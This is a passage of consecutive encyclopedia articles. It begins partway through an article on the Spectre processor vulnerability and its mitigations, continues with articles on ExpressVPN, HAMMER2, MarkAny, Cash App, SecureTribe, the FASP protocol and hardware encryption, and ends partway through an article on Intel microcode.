cache-hit or a cache-miss. While browsers like Chrome, Firefox, and Tor Browser (based on Firefox) have placed restrictions on the resolution of timers (required in Spectre exploit to determine if cache hit/miss), at the time of authoring the white paper, the Spectre author was able to create a high-precision timer using the web worker feature of HTML5. Careful coding and analysis of the machine code executed by the just-in-time compilation (JIT) compiler was required to ensure the cache-clearing and exploitive reads were not optimized-out. Impact As of 2018, almost every computer system is affected by Spectre, including desktops, laptops, and mobile devices. Specifically, Spectre has been shown to work on Intel, AMD, ARM-based, and IBM processors. Intel responded to the reported security vulnerabilities with an official statement. AMD originally acknowledged vulnerability to one of the Spectre variants (GPZ variant 1), but stated that vulnerability to another (GPZ variant 2) had not been demonstrated on AMD processors, claiming it posed a "near zero risk of exploitation" due to differences in AMD architecture. In an update nine days later, AMD said that "GPZ Variant 2...is applicable to AMD processors" and defined upcoming steps to mitigate the threat. Several sources took AMD's news of the vulnerability to GPZ variant 2 as a change from AMD's prior claim, though AMD maintained that their position had not changed. Researchers have indicated that the Spectre vulnerability can possibly affect some Intel, AMD, and ARM processors. Specifically, processors with speculative execution are affected with these vulnerabilities. ARM has reported that the majority of their processors are not vulnerable, and published a list of the specific processors that are affected by the Spectre vulnerability: Cortex-R7, Cortex-R8, Cortex-A8, Cortex-A9, Cortex-A15, Cortex-A17, Cortex-A57, Cortex-A72, Cortex-A73 and ARM Cortex-A75 cores. Other manufacturers' custom CPU cores implementing the ARM instruction set, such as those found in newer members of the Apple A series processors, have also been reported to be vulnerable. In general, higher-performance CPUs tend to have intensive speculative execution, making them vulnerable to Spectre. Spectre has the potential of having a greater impact on cloud providers than Meltdown. Whereas Meltdown allows unauthorized applications to read from privileged memory to obtain sensitive data from processes running on the same cloud server, Spectre can allow malicious programs to induce a hypervisor to transmit the data to a guest system running on top of it. Mitigation Since Spectre represents a whole class of attacks, most likely, there cannot be a single patch for it. While work is already being done to address special cases of the vulnerability, the original website devoted to Spectre and Meltdown states: "As [Spectre] is not easy to fix, it will haunt us for a long time." At the same time, according to Dell: "No 'real-world' exploits of these vulnerabilities [i.e., Meltdown and Spectre] have been reported to date [7 February 2018], though researchers have produced proof-of-concepts." Several procedures to help protect home computers and related devices from the vulnerability have been published. Spectre patches have been reported to significantly slow down performance, especially on older computers; on the newer eighth-generation Core platforms, benchmark performance drops of 2–14 percent have been measured. On 18 January 2018, unwanted reboots, even for newer Intel chips, due to Meltdown and Spectre patches, were reported. It has been suggested that the cost of mitigation can be alleviated by processors which feature selective translation lookaside buffer (TLB) flushing, a feature which is called process-context identifier (PCID) under Intel 64 architecture, and under Alpha, an address space number (ASN). This is because selective flushing enables the TLB behavior crucial to the exploit to be isolated across processes, without constantly flushing the entire TLB the primary reason for the cost of mitigation. In March 2018, Intel announced that they had developed hardware fixes for Meltdown and Spectre-V2 only, but not Spectre-V1. The vulnerabilities were mitigated by a new partitioning system that improves process and privilege-level separation. On 8 October 2018, Intel is reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its Coffee Lake-R processors and onwards. On 2 March 2019, Microsoft is reported to have released an important Windows 10 (v1809) software mitigation to the Spectre v2 CPU vulnerability. Particular software Several procedures to help protect home computers and related devices from the vulnerability have been published. Initial mitigation efforts were not entirely without incident. At first, Spectre patches were reported to significantly slow down performance, especially on older computers. On the newer eighth generation Core platforms, benchmark performance drops of 2–14 percent were measured. On 18 January 2018, unwanted reboots were reported even for newer Intel chips. Since exploitation of Spectre through JavaScript embedded in websites is possible, it was planned to include mitigations against the attack by default in Chrome 64. Chrome 63 users could manually mitigate the attack by enabling the Site Isolation feature (chrome://flags#enable-site-per-process). As of Firefox 57.0.4, Mozilla was reducing the resolution of JavaScript timers to help prevent timing attacks, with additional work on time-fuzzing techniques planned for future releases. On January 15th, 2018, Microsoft introduced mitigation for SPECTRE in Visual Studio. This can be applied by using the /Qspectre switch. A developer would need to download and install the appropriate libraries using the Visual Studio installer. General approaches On 4 January 2018, Google detailed a new technique on their security blog called "Retpoline" (return trampoline) which can overcome the Spectre vulnerability with a negligible amount of processor overhead. It involves compiler-level steering of indirect branches towards a different target that does not result in a vulnerable speculative out-of-order execution taking place. While it was developed for the x86 instruction set, Google engineers believe the technique is transferable to other processors as well. On 25 January 2018, the current status and possible future considerations in solving the Meltdown and Spectre vulnerabilities were presented. On 18 October 2018, MIT researchers suggested a new mitigation approach, called DAWG (Dynamically Allocated Way Guard), which may promise better security without compromising performance. On 16 April 2019, researchers from UC San Diego and University of Virginia proposed Context-Sensitive Fencing, a microcode-based defense mechanism that surgically injects fences into the dynamic execution stream, protecting against a number of Spectre variants at just 8% degradation in performance. Controversy When Intel announced that Spectre mitigation can be switched on as a "security feature" instead of being an always-on bugfix, Linux creator Linus Torvalds called the patches "complete and utter garbage". Ingo Molnár then suggested the use of function tracing machinery in the Linux kernel to fix Spectre without Indirect Branch Restricted Speculation (IBRS) microcode support. This would, as a result, only have a performance impact on processors based on Intel Skylake and newer architecture. This ftrace and retpoline-based machinery was incorporated into Linux 4.15 of January 2018. Immune hardware ARM: A53 A32 A7 A5 See also Foreshadow (security vulnerability) Microarchitectural Data Sampling Row hammer SPOILER (security vulnerability) Transient execution CPU vulnerabilities References Further reading External links Website detailing the Meltdown and Spectre vulnerabilities, hosted by Graz University of Technology Google Project Zero write-up Meltdown/Spectre Checker Gibson Research Corporation Spectre & Meltdown vulnerability/mitigation checker for Linux Speculative execution security vulnerabilities Hardware bugs Side-channel attacks 2018 in computing X86 architecture X86 memory management
56209375
https://en.wikipedia.org/wiki/ExpressVPN
ExpressVPN
ExpressVPN is a VPN service offered by the British Virgin Islands-registered company Express Technologies Ltd. The software is marketed as a privacy and security tool that encrypts users' web traffic and masks their IP addresses. In September 2021, it was reported that the service was being used by 3 million users. Also in September 2021, ExpressVPN was purchased by software developer Kape Technologies, formerly Crossrider, an adware platform. Kape also owns other VPN services and cybersecurity tools. History ExpressVPN's parent company, Express VPN International Ltd, was founded in 2009 by Peter Burchhardt and Dan Pomerantz, two serial entrepreneurs who were also Wharton School alumni. The parent company does business as ExpressVPN. On January 25, 2016, ExpressVPN announced that it would soon roll out an upgraded CA certificate. Also in December, ExpressVPN released open source leak testing tools on GitHub. In July 2017, ExpressVPN announced in an open letter that Apple had removed all VPN apps from its App Store in China, a revelation that was later picked up by The New York Times and other outlets. In response to questions from U.S. Senators, Apple stated it had removed 674 VPN apps from the App Store in China in 2017 at the request of the Chinese government. In December, ExpressVPN came into the spotlight in relation to the investigation of the assassination of Russian ambassador to Turkey, Andrei Karlov. Turkish investigators seized an ExpressVPN server which they say was used to delete relevant information from the assassin's Gmail and Facebook accounts. Turkish authorities were unable to find any logs to aid their investigation, which the company said verified its claim that it did not store user activity or connection logs, adding; "while it's unfortunate that security tools like VPNs can be abused for illicit purposes, they are critical for our safety and the preservation of our right to privacy online. ExpressVPN is fundamentally opposed to any efforts to install 'backdoors' or attempts by governments to otherwise undermine such technologies." In December 2019, ExpressVPN became a founding member of the VPN Trust Initiative, an advocacy group for online safety of consumers. In May 2020, the company released a new protocol it developed for ExpressVPN called Lightway, designed to improve connectivity speeds and reduce power consumption. In October, Yale Privacy Lab founder Sean O'Brien joined the ExpressVPN Digital Security Lab to conduct original research in the areas of privacy and cybersecurity. On September 13, 2021, it was reported that ExpressVPN had been acquired by Kape Technologies, an LSE-listed digital privacy and security company which operates three other VPN services: Private Internet Access, CyberGhost and ZenMate; antivirus software maker Intego; and other cybersecurity tools. This raised concerns based on Kape Technologies' predecessor Crossrider's history of making tools that were used for adware. At the time of the acquisition, ExpressVPN reportedly had over 3 million users. ExpressVPN announced in September 2021 that they would remain a separate service from existing Kape brands. On September 14, the US Department of Justice released a statement that ExpressVPN CIO Daniel Gericke, prior to joining the company, had helped the United Arab Emirates hack computers (including those of activists) without having a valid export license from the US government. In exchange for a deferred prosecution agreement, he agreed to pay a $335,000 fine and his security clearance was revoked. Features ExpressVPN has released apps for Windows, macOS, iOS, Android, Linux, and routers. The apps use a 4096-bit CA, AES-256-CBC encryption, and TLSv1.2 to secure user traffic. Available VPN protocols include Lightway, OpenVPN (with TCP/UDP), SSTP, L2TP/IPSec, and PPTP. The software also features a Smart DNS feature called MediaStreamer, to add VPN capabilities to devices that do not support them, and a router app, allowing the VPN to be set up on a router, bypassing unsupported devices such as gaming consoles. ExpressVPN is incorporated in the British Virgin Islands, a privacy-friendly country that has no data retention laws, and is a separate legal jurisdiction to the United Kingdom. ExpressVPN's parent company also develops leak testing tools, which enable users to determine if their VPN provider is leaking network traffic, DNS, or true IP addresses while connected to the VPN, such as when switching from a wireless to a wired internet connection. Servers , ExpressVPN's 3,000 server network covered 160 VPN server locations across 94 countries. In April 2019, ExpressVPN announced that all their VPN servers ran solely on volatile memory (RAM), not on hard drives. This was the first example in the VPN industry for such a server security setup, and was referred to as TrustedServer. Lightway protocol Lightway is ExpressVPN's open source VPN protocol. It is similar to the WireGuard protocol, but uses wolfSSL encryption to improve speed on embedded devices such as routers and smartphones. It does not run in the operating system's Kernel, but is lightweight to support auditing. It is reportedly twice as fast as OpenVPN, and supports TCP and UDP. Reception TorrentFreak has included ExpressVPN in their annual comparison of Best VPN providers since 2015. On January 14, 2016, ExpressVPN was criticized by former Google information security engineer Marc Bevand for using weak encryption. Bevand had discovered that only a 1024-bit RSA key was used to encrypt the service's connections after using it to test the strength of the Great Firewall of China. He described ExpressVPN as "one of the top three commercial VPN providers in China" and asserted that the Chinese government would be able to factor the RSA keys to potentially spy on users. On February 15, Bevand updated his criticism and noted that the company reported to him that it switched to more secure 4096-bit RSA keys. In a review done by PCMag UK editor Max Eddy in May 2017, the service scored 4 out of 5 with the bottom-line being that although the service was not the fastest, it "certainly protects your data from thieves and spies." PC World rated the service 3½ out of 5 in their September 2017 review, commending it for its easy-to-use software while criticizing "the secrecy behind who runs the company." In October 2017, TechRadar gave the service 4½ out of 5 stars, calling it "a premium service with well-crafted clients, an ample choice of locations and reliable performance." In 2018, Cyber security website Comparitech tested ExpressVPNs leak testing tools with 11 popular VPN services and found leaks across every VPN provider, with the exception of ExpressVPN. However, they clarified, "To be fair, ExpressVPN built the test tools and applied them to its own VPN app prior to publication of this article, so it has already patched leaks that it initially detected." The service received 4.5 out of 5 stars from VPNSelector in their July 2019 review, putting it in first place among VPN providers. In 2020, tech publication TechRadar named ExpressVPN its editor's choice. In 2021, TechRadar and CNET named the service their Editors' Choice. See also Comparison of virtual private network services References External links ExpressVPN's official website Internet privacy Internet properties established in 2009 Virtual private network services Software companies Information technology companies of the British Virgin Islands YouTube sponsors
56276869
https://en.wikipedia.org/wiki/HAMMER2
HAMMER2
HAMMER2 is a successor to the HAMMER filesystem, redesigned from the ground up to support enhanced clustering. HAMMER2 supports online and batched deduplication, snapshots, directory entry indexing, multiple mountable filesystem roots, mountable snapshots, a low memory footprint, compression, encryption, zero-detection, data and metadata checksumming, and synchronization to other filesystems or nodes. History The HAMMER2 file system was conceived by Matthew Dillon, who initially planned to bring it up to minimal working state by July 2012 and ship the final version in 2013. During Google Summer of Code 2013 Daniel Flores implemented compression in HAMMER2 using LZ4 and zlib algorithms. On June 4, 2014, DragonFly 3.8.0 was released featuring support for HAMMER2, although the file system was said to be not ready for use. On October 16, 2017, DragonFly 5.0 was released with bootable support for HAMMER2, though file-system status was marked as experimental. HAMMER2 had a long incubation and development period before it officially entered production in April 2018, as the recommended root filesystem in the Dragonfly BSD 5.2 release. Dillon continues to actively develop and maintain HAMMER2 as of June 2020. See also Comparison of file systems List of file systems ZFS Btrfs OpenZFS References External links DragonFly BSD Distributed file systems 2014 software
56282618
https://en.wikipedia.org/wiki/MarkAny
MarkAny
MarkAny Inc. () is an information security company headquartered in Seoul, South Korea. MarkAny holds technologies including DRM, anti-forgery of electronic document, digital signature, and digital watermarking. Based on the technologies, MarkAny offers information security products for data protection, document encryption, electronic certification, and copyright protection. History MarkAny has founded in February 1999 by Professor Choi Jong-uk and his graduate students at Sangmyung University. In 2002, MarkAny provided anti-forgery and physical copy protection solution for electronic certificate issuing system of Gangnam-gu Office, and in 2003, for National Tax Service of South Korea and Supreme Court of South Korea. Later MarkAny supplied its anti-forgery solution for more than 200 companies and government agencies worldwide. MarkAny started business on information security of digital CCTV footage data in 2013 by providing video data management system for CCTV control center of Tongyeong City Government. In 2014, MarkAny provided its audio watermarking solution to Seoul Broadcasting System, a South Korean television station. From 2017, MarkAny has been a member of Ultra HD Forum and enrolled as a supporter of the creation of forensic watermarking guideline with other watermarking vendor companies. In 2017 NAB Show, MarkAny have practiced real-time embedding of forensic watermark over UHD video stream. In late 2017, MarkAny announced its first cloud-based DRM solution. Products provided by the company include DRM for documents and multimedia content, mobile device management, and digital watermarking for copyrighted multimedia. Controversy MarkAny's digital watermarking technology has been controversial and issues have been raised due to its intrusive ability of monitoring and modifying media files, unbeknownst to the end user by enveloping itself as part of a software's bundle. This "watermarking" feature stores a personally identifiable tracking ID, within obscure extension subtags permitted in these formats with features having discovered to "home-call" back to servers in the background. Active attempts to conceal their DRM to the normal OS I/O operations, while appearing free of any alternation without the permission or notification to the user has led to advisories on its rootkit and malware characteristics. Affiliations As of January 2018, MarkAny is a member company of Digital Watermarking Alliance and a contributor member of Ultra HD Forum. References External links Information technology companies of South Korea Technology companies established in 1999 South Korean companies established in 1999 Companies based in Seoul Security companies of South Korea South Korean brands
56289457
https://en.wikipedia.org/wiki/Cash%20App
Cash App
Cash App (formerly known as Square Cash) is a mobile payment service developed by Block, Inc. that allows users to transfer money to one another (for a 1.5% fee for immediate transfer) using a mobile phone app. The service is only available in the US and the UK. In September 2021, the service reported 70 million annual transacting users and has generated $1.8 billion in gross profit. History Cash App was launched by Square, Inc. (the former name of Block, Inc.) in October 15, 2013 under the name "Square Cash". In March 2015, Square introduced Square Cash for businesses. This allowed individuals, organizations, and business owners to create a unique username to send and receive money, known as a $cashtag. Since then, the $cashtag has become the most popular method for users to transfer money. In January 2018, Cash App added support for bitcoin trading. In October 2019, Cash App added support for stock trading to users in the United States. In November 2020, Square announced it was acquiring Credit Karma Tax, a free do-it-yourself tax-filing service, for $50 million and would make it a part of its Cash App unit. On November 3, 2021, Square opened up Cash App to teenagers between the age of 13 and 17. The app previously required its users to be at least 18 years old. Younger teens will require a parent or guardian to authorize their account and will not have access to bitcoin or stock trading until they turn 18. Services Banking The service allows users to send, receive, and store money. Users can transfer money out of Cash App to any local bank account. The Cash Card is a customizable debit card that allows users to spend their money at various retailers and withdraw cash from an ATM. When signing up for the Cash Card, users can customize it by selecting a color, adding stamps, drawing on it, and even making the card glow in the dark. Once your custom design is finalized, the card is sent to the user through the mail. As of March 7, 2018, the Cash App supports automated clearing house (ACH) direct deposits. Peer-to-peer money transfer Users can request and transfer money to other Cash App accounts via phone number, email, or $cashtag. The $cashtag acts as a unique username for the user's account and can only be changed twice. When transferring money, users can optionally add a message to be sent to the counterparty. Cash App provides two options to transfer money into a third party bank account; wait 3-5 business days, or instantly withdraw with a 1.5% fee. This is despite advertising that transfers are "fast and free" and "Fast payments for free". Unverified accounts may only send $250/week and receive $1,000/month. In order to verify an account, a user must submit their legal name, date of birth, and the last four digits of their social security number. Verification raises the weekly sending limit to $7,500/week and completely removes the receiving limit. Cryptocurrency In 2018, the capability to buy and sell bitcoin was added to the app. Users can also send bitcoin to each other using their $cashtag, deposit bitcoin into the app from another source, and withdraw their bitcoin to an external wallet. Unlike other cryptocurrency exchanges, buying and selling bitcoin on Cash App is instant and does not require confirmation on the blockchain. Currently, Cash App only supports bitcoin and has not announced any plans to support other cryptocurrencies in the future. Bitcoin trading is currently not available to minors on Cash App. Investing In 2020, the capability to trade stocks was added to the app for US residents only. Users can buy and sell fractional shares of most publicly traded companies with a minimum of $1. Stock trading follows standard market hours of 9:30 am – 4:00 pm EST and can be managed from the app’s investing section. Stock trading is currently not available to minors on Cash App. Finances As of November 1, 2021, Square has a market capitalization of $117.4 billion. Its largest market competitor is Paypal, which owns Venmo. Other major competitors include Apple Pay, Google Pay, and Zelle. Business model Cash App is free to download on the Google Play Store, Apple App Store, and other mobile store platforms. Because the app is initially free, it incentivizes more users to create an account and use its services. If users want additional services other than a standard money transfer, Cash App charges small percentage fees and/or initial fixed costs to generate revenue. Cash App's primary revenue stream comes from users withdrawing funds from the app to their linked bank accounts. Cash App provides two options to transfer money into a third party bank account; wait 3-5 business days, or instantly withdraw with a 1.5% fee. If users don’t have a direct deposit account with the app, they will be charged a $2 fee for withdrawing money from an ATM. Cash App also allows users to buy and sell bitcoin from their platform for a small service fee based on the current bitcoin market volatility. Businesses can also accept Cash App as a form of payment and charge a transaction cost of 2.75%. Similar to banks, Cash App will occasionally loan out money from users' accounts to various institutions. By doing so, they charge interest and create revenue, also known as money creation. In the case of a bank run, Cash App is required to hold 10% of the users' accounts liquidity as part of the fractional-reserve banking. Safety and protection policies Cash App uses a combination of encryption and fraud detection technologies to help secure users' data and money. All data is encrypted and sent to Square’s secure servers regardless of the connection type (public and private WiFi and all forms of mobile data). If fraud is detected at any point during a transaction, Cash App will automatically cancel the transaction. To further increase security, upon signing into an account, a user is sent a one-time use login code by SMS or email. Cash App includes an option in its settings labeled Security Lock. This provides users an extra step of protection as it requires users to enter their password before completing any transaction. Fraud and illicit activity There has been a reported history of scams via Cash App. Common scams include customer support impersonation, fake offers and programs, flipping, and the selling of fake expensive items. Many of these scams are hard to dispute, offering little buyer protection in comparison to services like PayPal. Since the start of COVID-19 pandemic and the rise in use of payment apps, there has been a notable increase in reported scams. In one instance, a man was scammed out of $24,000 due to customer support impersonation. In another instance, a scammer used the public video of a female Waffle House worker holding a baby in a kitchen to fabricate an emotional story. The scammer used social media to share their Cash App information in hopes of receiving donations from unsuspecting victims that wanted to help out. Millennials frequently utilize payment platforms like Cash App and Venmo to pay for illegal drugs or gamble. In June 2021, police in West Baltimore arrested seven people for using Cash App as a means to sell cocaine and heroin to nearby neighborhoods. Cultural impact In 2018, Cash App surpassed Venmo in total downloads (33.5 million cumulative), becoming one of the most popular peer-to-peer payment platforms available. Cash App is mentioned by about 200 hip-hop artists in their song lyrics, leading some to assert that it is now "ingrained in hip-hop culture," with its popularity stemming from African American communities in the Atlanta area. Some cite the early adoption of cryptocurrencies among members of the rap community as another reason for Cash App's cultural cachet. The popularity of the app in hip-hop is reflected in Square's partnerships with prominent rappers, such as Travis Scott, Megan Thee Stallion, and Cardi B. Social media influencers frequently use Cash App to request donations from their followers. Every Friday since 2017, Twitter users retweet posts from the official Cash App account with the #SuperCashAppFriday hashtag to potentially win $10,000 to $50,000. These posts often have a notable amount of engagement. References External links Block, Inc. Online payments Mobile payments 2013 software
56314778
https://en.wikipedia.org/wiki/SecureTribe
SecureTribe
SecureTribe is an iOS-based secure image-sharing and video-sharing app, designed from the ground up with end-to-end encryption. SecureTribe is used by over 3.8 million users as an alternative to Instagram and Snapchat as a place to securely connect with family and friends and share photos without worrying about hackers stealing or interfering with the user's data. SecureTribe allows users to create unique groups, called Tribes, where they can post pictures and videos, organized into albums. Users can then choose to enable this tribe to be visible publicly or only to approved friends. As the owner of a Tribe, you can allow or disable the ability for others to upload into your Tribe and/or save a copy of the files from your Tribe. No content can be shared or accidentally leaked from Tribe to Tribe; content can only be shared within the tribe. You can also choose to share content publicly. Users can subscribe to Tribes created by their friends and will see new posts in the What's New Timeline. Unless you are invited to a Tribe, other users will not know that that Tribe exists, allowing more privacy than other group messaging apps. Technology Use cases Sharing artistic expression with friends without government censors Parent sharing baby pictures with friends and family Bands/Models/Stand up comedians sharing VIP content with fans See also List of Image Sharing Websites References External links American photography websites Online mass media companies of the United States IOS software Mobile software Photo software Video software
56353049
https://en.wikipedia.org/wiki/Fast%20and%20Secure%20Protocol
Fast and Secure Protocol
The Fast Adaptive and Secure Protocol (FASP) is a proprietary data transfer protocol. FASP is a network-optimized network protocol developed by Aspera, owned by IBM. The associated client/server software packages are also commonly called Aspera. The technology is patented under US Patent #20090063698, Method and system for aggregate bandwidth control. Similar to the connectionless UDP protocol, FASP does not expect any feedback on every packet sent. Only the packets marked as really lost must be requested again by the recipient. As a result, it does not suffer as much loss of throughput as TCP does on networks with high latency or high packet loss. Large organizations like IBM, the European Nucleotide Archive, the US National Institutes of Health National Center for Biotechnology Information and others use the protocol in different areas. Amazon also wants to use the protocol for uploading to data centers. Security FASP has built-in security mechanisms that do not affect the transmission speed. The encryption algorithms used are based exclusively on open standards. Before the transfer, SSH is used for key exchange for authentication. These randomly generated, one-way keys are discarded at the end of the transmission. The data is encrypted or decrypted immediately before sending and receiving with the AES-128. To counteract attacks by monitoring the encrypted information during long transfers, the AES is operated in cipher feedback mode with a secret initialization vector for each block. In addition, an integrity check of each data block takes place, in which case, for example, a man-in-the-middle attack would be noticed. Protocol FASP's control port is TCP port 22 the same port that SSH uses. For data transfer, it begins at UDP port 33001, which increments with each additional connection thread. See also Tsunami UDP Protocol UDP-based Data Transfer Protocol (UDT) QUIC GridFTP References Internet protocols Internet Standards Transport layer protocols
56358777
https://en.wikipedia.org/wiki/Hardware-based%20encryption
Hardware-based encryption
Hardware-based encryption is the use of computer hardware to assist software, or sometimes replace software, in the process of data encryption. Typically, this is implemented as part of the processor's instruction set. For example, the AES encryption algorithm (a modern cipher) can be implemented using the AES instruction set on the ubiquitous x86 architecture. Such instructions also exist on the ARM architecture. However, more unusual systems exist where the cryptography module is separate from the central processor, instead being implemented as a coprocessor, in particular a secure cryptoprocessor or cryptographic accelerator, of which an example is the IBM 4758, or its successor, the IBM 4764. Hardware implementations can be faster and less prone to exploitation than traditional software implementations, and furthermore can be protected against tampering. History Prior to the use of computer hardware, cryptography could be performed through various mechanical or electro-mechanical means. An early example is the Scytale used by the Spartans. The Enigma machine was an electro-mechanical system cipher machine notably used by the Germans in World War II. After World War II, purely electronic systems were developed. In 1987 the ABYSS (A Basic Yorktown Security System) project was initiated. The aim of this project was to protect against software piracy. However, the application of computers to cryptography in general dates back to the 1940s and Bletchley Park, where the Colossus computer was used to break the encryption used by German High Command during World War II. The use of computers to encrypt, however, came later. In particular, until the development of the integrated circuit, of which the first was produced in 1960, computers were impractical for encryption, since, in comparison to the portable form factor of the Enigma machine, computers of the era took the space of an entire building. It was only with the development of the microcomputer that computer encryption became feasible, outside of niche applications. The development of the World Wide Web lead to the need for consumers to have access to encryption, as online shopping became prevalent. The key concerns for consumers were security and speed. This led to the eventual inclusion of the key algorithms into processors as a way of both increasing speed and security. Implementations In the instruction set x86 The X86 architecture, as a CISC (Complex Instruction Set Computer) Architecture, typically implements complex algorithms in hardware. Cryptographic algorithms are no exception. The x86 architecture implements significant components of the AES (Advanced Encryption Standard) algorithm, which can be used by the NSA for Top Secret information. The architecture also includes support for the SHA Hashing Algorithms through the Intel SHA extensions. Whereas AES is a cipher, which is useful for encrypting documents, hashing is used for verification, such as of passwords (see PBKDF2). ARM ARM processors can optionally support Security Extensions. Although ARM is a RISC (Reduced Instruction Set Computer) architecture, there are several optional extensions specified by ARM Holdings. As a coprocessor IBM 4758 – The predecessor to the IBM 4764. This includes its own specialised processor, memory and a Random Number Generator. IBM 4764 and IBM 4765, identical except for the connection used. The former uses PCI-X, while the latter uses PCI-e. Both are peripheral devices that plug into the motherboard. Proliferation Advanced Micro Devices (AMD) processors are also x86 devices, and have supported the AES instructions since the 2011 Bulldozer processor iteration. Due to the existence of encryption instructions on modern processors provided by both Intel and AMD, the instructions are present on most modern computers. They also exist on many tablets and smartphones due to their implementation in ARM processors. Advantages Implementing cryptography in hardware means that part of the processor is dedicated to the task. This can lead to a large increase in speed. In particular, modern processor architectures that support pipelining can often perform other instructions concurrently with the execution of the encryption instruction. Furthermore, hardware can have methods of protecting data from software. Consequently, even if the operating system is compromised, the data may still be secure (see Software Guard Extensions). Disadvantages If, however, the hardware implementation is compromised, major issues arise. Malicious software can retrieve the data from the (supposedly) secure hardware – a large class of method used is the timing attack. This is far more problematic to solve than a software bug, even within the operating system. Microsoft regularly deals with security issues through Windows Update. Similarly, regular security updates are released for Mac OS X and Linux, as well as mobile operating systems like iOS, Android, and Windows Phone. However, hardware is a different issue. Sometimes, the issue will be fixable through updates to the processor's microcode (a low level type of software). However, other issues may only be resolvable through replacing the hardware, or a workaround in the operating system which mitigates the performance benefit of the hardware implementation, such as in the Spectre exploit. See also Disk encryption hardware Hardware-based full disk encryption Hardware security module References Computer hardware Cryptography
56384922
https://en.wikipedia.org/wiki/Intel%20Microcode
Intel Microcode
Intel microcode is microcode that runs inside x86 processors made by Intel. Since the P6 microarchitecture introduced in the mid-1990s, the microcode programs can be patched by the operating system or BIOS firmware to work around bugs found in the CPU after release. Intel had originally designed microcode updates for processor debugging under its design for testing (DFT) initiative. Following the Pentium FDIV bug, the patchable microcode function took on a wider purpose to allow in-field updating without needing to do a product recall. In the P6 and later microarchitectures, x86 instructions are internally converted into simpler RISC-style micro-operations that are specific to a particular processor and stepping level. Micro-operations On the Intel 80486 and AMD Am486 there are approximately 250 lines of microcode, totalling 12,032 bits stored in the microcode ROM. On the Pentium Pro, each micro-operation is 72-bits wide, or 118-bits wide. This includes an opcode, two source fields, and one destination field, with the ability to hold a 32-bit immediate value. The Pentium Pro is able to detect parity errors in its internal microcode and report these via the Machine Check Architecture. Micro-operations have a consistent format with up to three source inputs, and two destination outputs. The processor performs register renaming to map these inputs to and from the real register file (RRF) before and after their execution. Out-of-order execution is used, so the micro-operations and instructions they represent may not appear in the same order. During development of the Pentium Pro, several microcode fixes were included between the A2 and B0 steppings. For the Pentium II (based on the P6 Pentium Pro), additional micro-operations were added to support the MMX instruction set. In several cases, "microcode assists" were added to handle rare corner-cases in a reliable way. The Pentium 4 can have 126 micro-operations in flight at the same time. Micro-operations are decoded and stored in an Execution Trace Cache with 12,000 entries, to avoid repeated decoding of the same x86 instructions. Groups of six micro-operations are packed into a trace line. Micro-operations can borrow extra immediate data space within the same cache-line. Complex instructions, such as exception handling, result in jumping to the microcode ROM. During development of the Pentium 4, microcode accounted for 14% of processor bugs versus 30% of processor bugs during development of the Pentium Pro. The Intel Core microarchitecture introduced in 2006 added "micro-operations fusion" for some common pairs of instructions including comparison followed by a jump. The instruction decoders in the Core convert x86 instructions into microcode in three different ways: For Intel's hyper-threading implementation of simultaneous multithreading, the microcode ROM, trace cache, and instruction decoders are shared, but the micro-operation queue is not shared. Update facility In the mid-1990s, a facility for supplying new microcode was initially referred to as the Pentium Pro BIOS Update Feature. It was intended that user-mode applications should make a BIOS interrupt call to supply a new "BIOS Update Data Block", which the BIOS would partially validate and save to nonvolatile BIOS memory; this could be supplied to the installed processors on next boot. Intel distributed a program called BUP_UTIL.EXE, renamed CHECKUP3.EXE that could be run under DOS. Collections of multiple microcode updates were concatencated together and numerically numbered with the extension .PDB, such as PEP6.PDB. Processor interface The processor boots up using a set of microcode held inside the processor and stored in an internal ROM. A microcode update populates a separate SRAM and set of "match registers" that act as breakpoints within the microcode ROM, to allow jumping to the updated list of micro-operations in the SRAM. A match is performed between the Microcode Instruction Pointer (UIP) all of the match registers, with any match resulting in a jump to the corresponding destination microcode address. In the original P6 architecture there is space in the SRAM for 60 micro-operations, and multiple match/destination register pairs. It takes one processor instruction cycle to jump from ROM microcode to patched microcode held in SRAM. Match registers consist of a microcode match address, and a microcode destination address. The processor must be in protection ring zero ("") in order to initiate a microcode update. Each CPU in a symmetric multiprocessing arrangement needs to be updated individually. An update is initiated by placing its address in eax register, setting ecx = 0x79, and executing a wrmsr (Write model-specific register). Microcode update format Intel distributes microcode updates as a 2,048 (2 kilobyte) binary blob. The update contains information about which processors it is designed for, so that this can be checked against the result of the CPUID instruction. The structure is a 48-byte header, followed by 2,000 bytes intended to be read directly by the processor to be updated: A microcode program that is executed by the processor during the microcode update process. This microcode is able to reconfigure and enable or disable components using a special register, and it must update the breakpoint match registers. Up to sixty patched micro-operations to be populated into the SRAM. Padding consisting of random values, to obfuscate understanding of the format of the microcode update. Each block is encoded differently, and the majority of the 2,000 bytes are not used as configuration program and SRAM micro-operation contents themselves are much smaller. Final determination and validation of whether an update can be applied to a processor is performed during decryption via the processor. Each microcode update is specific to a particular CPU revision, and is designed to be rejected by CPUs with a different stepping level. Microcode updates are encrypted to prevent tampering and to enable validation. With the Pentium there are two layers of encryption and the precise details explicitly documented by Intel, instead being only known to fewer than ten employees. Microcode updates for Intel Atom, Nehalem and Sandy Bridge additionally contain an extra 520-byte header containing a 2048-bit RSA modulus with an exponent of 17 decimal. Debugging Special debugging-specific microcode can be loaded to enable Extended Execution Trace, which then outputs extra information via the Breakpoint Monitor Pins. On the Pentium 4, loading special microcode can give access to Microcode Extended Execution Trace mode. When using the JTAG Test Access Port (TAP), a pair of Breakpoint Control registers allow breaking on microcode addresses. During the mid-1980s NEC and Intel had a long-running US federal court case about microcode copyright. NEC had been acting as a second source for Intel 8086 CPUs with its NEC μPD8086, and held long-term patent and copyright cross-licensing agreements with Intel. In August 1982 Intel sued NEC for copyright infringement over the microcode implementation. NEC prevailed by demonstrating via cleanroom software engineering that the similarities in the implementation of microcode on its V20 and V30 processors was the result of the restrictions demanded by the architecture, rather than via copying. The Intel 386 can perform a built-in self-test of the microcode and programmable logic arrays, with the value of the self-test placed in the EAX register. During the BIST, the microprogram counter is re-used to walk through all of the ROMs, with the results being collated via a network of multiple-input signature registers (MISRs) and linear-feedback shift registers. On start up of the Intel 486, a hardware-controlled BIST runs for 220 clock cycles to check various arrays including the microcode ROM, after which control is transferred to the microcode for further self-testing of registers and computation units. The Intel 486 microcode ROM has 250,000 transistors. AMD had a long-term contract to reuse Intel's 286, 386 and 486 microcode. In October 2004, a court ruled that the agreement did not cover AMD distributing Intel's 486 in-circuit emulation (ICE) microcode. Direct Access Testing Direct Access Testing (DAT) is included in Intel CPUs as part of the design for testing (DFT) and Design for Debug (DFD) initiatives allow full coverage 